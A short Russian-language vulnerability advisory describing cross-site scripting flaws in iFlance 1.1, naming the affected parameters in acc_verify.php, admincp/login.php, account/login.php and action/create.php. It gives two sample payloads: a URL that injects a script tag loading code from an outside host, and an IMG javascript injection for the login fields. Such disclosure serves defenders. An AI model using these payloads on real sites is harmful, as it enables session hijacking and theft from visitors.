Программа: iFlance 1.1, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре "vk" в сценарии acc_verify.php, в параметре "adminU" в сценарии admincp/login.php, в параметрах "user" и "pass" в сценарии account/login.php и в параметре "project_name" в сценарии action/create.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://www.example.com/account/acc_verify.php?vk="><SCRIPT%20 SRC=http://ha.ckers.org/xss.js></SCRIPT><"&verify=verify

Пароль и имя:

<IMG SRC=javascript:alert(‘XSS’)>
 



Оставить мнение